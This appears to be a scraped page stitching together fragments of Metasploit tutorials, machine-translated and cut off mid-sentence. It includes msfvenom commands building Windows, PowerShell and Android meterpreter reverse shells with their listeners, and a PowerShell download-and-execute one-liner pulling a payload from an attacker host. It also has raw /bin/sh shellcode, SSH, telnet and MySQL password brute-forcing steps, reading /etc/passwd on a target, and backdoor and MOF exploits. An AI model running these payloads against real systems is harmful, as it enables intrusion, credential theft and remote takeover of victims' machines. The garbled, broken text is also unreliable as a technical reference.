learn metasploit

Metasploit connecting the PostgreSQL database:1. Turn on the PostgreSQL service: Services PostgreSQL start2. Enter PostgreSQL, set the default user password, create a new user, set new user permissions, create a database:Sudo-u postgres psql# access to PostgreSQL Default userAlter user postgres with password ' password '; #设置默认用户的登录密码Create user ' username ' wiht password ' password ' nocreatedb; #创建带密码的新用户Create database name ' with owner = ' user na

1, first look at the PostgreSQL port, the default is automatically open, Port 7337.[Email protected]:~# netstat-tnpl |grep PostgresTCP 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1100/postgresTCP6 0 0:: 1:7337:::* LISTEN 1100/postgres2. View the MSF configuration with database users and Passwords[Email protected]:~# cat/opt/metasploit/config/database.ymlDevelopment:www.2cto.comAdapter: "PostgreSQL"Database: "Msf3dev"Username: "MSF3"Password: "C80c3cea"port:73

}Second, we payload first to use the first validated run/bin/sh shellcode#Build the buffer for transmissionbuf=""; BUF = Make_nops ();buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh"; #buf+= "\XA4\XF4\XFF\XBF" #buf + = payload.encodedBUF + = [].fill (target.ret,0,100). Pack ('v*')In particular, note that the number of NOP instructions We added last time is 15

Password Code blasting moduleBlasting SSH service password guessing most of them are search SSH under Linux this time we can see a lot of search ssh_login find a dictionaryUse Auxiliary/scanner/ssh/ssh_loginShow Optionsset RHOST IP address set pass_file passset USERNAME rootexploitThe operation of the other services below it is the same, not one operation.Demolition hack telnet slow search telnet_loginuse auxiliary/scanner/telnet/telnet_loginshow opiotnsset RHOST ipset pass_file Passset USERNAME

Fool-style use ms03_026_dcom:Matching Modules================Name Disclosure Date Rank Description---- --------------- ---- -----------Auxiliary/scanner/telnet/telnet_ruggedcom normal ruggedcom telnet Password generatorexploit/windows/dcerpc/ms03_026_dcom2003- -- -Great ms03-026Microsoft RPC DCOM Interface overflowexploit/windows/smb/ms04_031_netdde2004-Ten- AGood ms04-031Microsoft NetDDE Service overflowexploit/windows/smb/psexec_psh1999- on- onmanual Microsoft Windows authenticated Powershell

Network topology:1. Generate Shellcode:[Email protected]:~# msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211-f exe >/root/ Shell.exe2. Listen for Shellcode:MSF > Use Exploit/multi/handlerMSF exploit (Multi/handler) > Set Payload windows/meterpreter/reverse_tcpPayload = Windows/meterpreter/reverse_tcpMSF exploit (Multi/handler) > Set lhost 192.168.152.131Lhost = 192.168.152.131MSF exploit (Multi/handler) > Set Lport 1211Lport = 1211MSF exploit (Multi/handler) > Exploit[

=" Wkiol1hki0za_vcjaabbeoqv9pi188.jpg "/>1.11 Enter "CD Rootfs" in the terminal, enter the Rootfs directory, enter the command "LS" under Terminal to list the directory.1.12 Enter "MORE/ETC/PASSWD" in the terminal to view the password in the target host system.650) this.width=650; "src=" http://s1.51cto.com/wyfs02/M02/8B/58/wKiom1hKI03yl_DnAACw2l6usRw373.jpg "style=" float: none; "title=" 5.jpg "alt=" Wkiom1hki03yl_dnaacw2l6usrw373.jpg "/>650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M0

Metasploit Overflow UNREALIRCD Backdoor VulnerabilityUse the UNREALIRCD backdoor vulnerability to obtain root permissions for the target host.The unrealircd of some sites, in which Debug3_dolog_system macros contain externally introduced malicious code, allows remote attackers to execute arbitrary code.First, using the Nmap tool to scan the target hostThe 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop and sel

There are many exploits in the Metasploit framework, including buffer overflows, browser exploits, Web application vulnerabilities, Backdoor exploits, Zombie takeover tools, and More. Exploit developers and people who have contributed to this framework have shared a lot of interesting and useful things.

First, use Msfvenom to generate PS1 files:Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168. 217.162 lport=7788 -F psh-reflection >7788. PS1Second, open MSF monitoring: use exploit/multi/> Set payload windows/x64/meterpreter/= windows/meterpreter/ > Set lhost xxx.xxx.xxx. = = xxx.xxx.xxx. >=> RunSecond, execute the CMD command on the target machine:" IEX (New-object net.webclient). Downloadstring (' Http://192.168.217.162/7788.ps1 '); Xx.ps1"Note whether the target and system are 3

First I build an Android app under Kali, that is, the APK format file, the command used is:Msfvenom-p android/meterpreter/reverse_tcp lhost= Local IP lport= listening port R >/root/rb.apkNote:-P: Refers to the payload used in this environment, the payload is the successful Android attack after the rebound connection sent to the attacker's terminal;Lhoost and Lport refer to the local bounce IP address and the local listening port;-r: Indicates the type of file to be generated;>/root/rb.apk: Indic

really all do not kill is not, part still can, mainly is introduce msfvenom.-----There are still a lot of instructional videos and materials that are used before the Kali version. With the update some commands are not adapted to the newest Kali. (also a person who has fallen out of the pit)After Msfvenom integrates Msfpayload and msfencode,2015, the latter two items are removed. It is not possible to follow some tutorials to lose two commands. Msfvenom Important parameters: (You can use ms

\x5a\x51\xff "" \xe0\x58\x5f\x5a\x8b\x12\xeb\ x86\x5d\x68\x63\x6d\x64\x00\x89 "" \xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44 "" \x24\x3c\x01\ x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56 "" \x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5 " "\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" "\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\ x3c\x06\x7c\x0a "" \x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5 "; root@bt:~# Produced two stages

How do I use the zoomeye API? If you is a Python developer, please view zoomeye-sdk. If not, the zoomeye API documentation is good for you. $ sudo easy_install zoomeye-sdk Or $ sudo pip install Git+https://github.com/zoomeye/sdk.git How to search targets with Zoomeye in Metasploit? MSF auxiliary (zoomeye_search) > Info name:zoomeye search Module:auxiliary/gather/zoomeye_search Lice Nse:metasploit Framework License (BSD) Rank:normal provided By:nix

[Root@localhost app]# Msfconsole Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f eflags: 00010046 eax:00000001 ebx:f77c8c00 ecx:00000000 edx:f77f0001 esi:803bf014 edi:8023c755 ebp:80237f84 esp:80237f60 ds:0018 es:0018 ss:0018 Process Swapper (pid:0, Process nr:0, stackpage=80377000) stack:90909090990909090990909 090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090. 90909090.09090900 90909090.90909090.09090900 .... ccc

Tags: REM GRE username efault exp scanner Ann def nameMSF > Use Auxiliary/scanner/mysql/mysql_loginMSF auxiliary (mysql_login) > Set RHOSTS 5.5.5.3RHOSTS = 5.5.5.3MSF auxiliary (mysql_login) > Set USERNAME rootUSERNAME = rootMSF auxiliary (mysql_login) > Set pass_file/pen/msf3/data/wordlists/postgres_default_pass.txtPass_file =/pen/msf3/data/wordlists/postgres_default_pass.txtMSF auxiliary (mysql_login) > Exploit[*] 5.5.5.3:3306 mysql–found remote MYSQL version 5.5.16[*] 5.5.5.3:3306 mysql–[1/7]

We first go to this directory to see the contents of the Database.yml file:It's the information we see.Then open Metasploit, run the db_connect instruction link database. The format is:Db_connect User name: password @127.0.0.1: Port/Database nameIn my case, that is:Db_connect MSF: Password @127.0.0.1:5432/msfAfter that, the database is connected.Below is the Nmap scan and store the results:The-ox instruction is to store nmap results in a place of deve

Metasploitis an open source security vulnerability detection tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligenceFeatures: This scalable model integrates load control, encoders, no-action generators, and vulnerabilities, making the Metasploit Framework a way to study high-risk vulnerabilities. It integ

[root@localhost app]# msfconsole ______________________________________________________________________________ | | | METASPLOIT CYBER missile COMMAND V4 | |____________________________________________________________ __________________| \ / / \ . //x \//\ / + /

In view of the previous article http://z2ppp.blog.51cto.com/11186185/1975985 MySQL MOF rightMetasploit already have the use of code for this way, the principle or the same as the production of MOF files, only Metasploit can use to bounce technology, no additional users, provided that the other server allows access to the public networkUse exploit/windows/mysql/mysql_mofset password XXX//Set login MySQL password set username XXX//Set login to MySQL use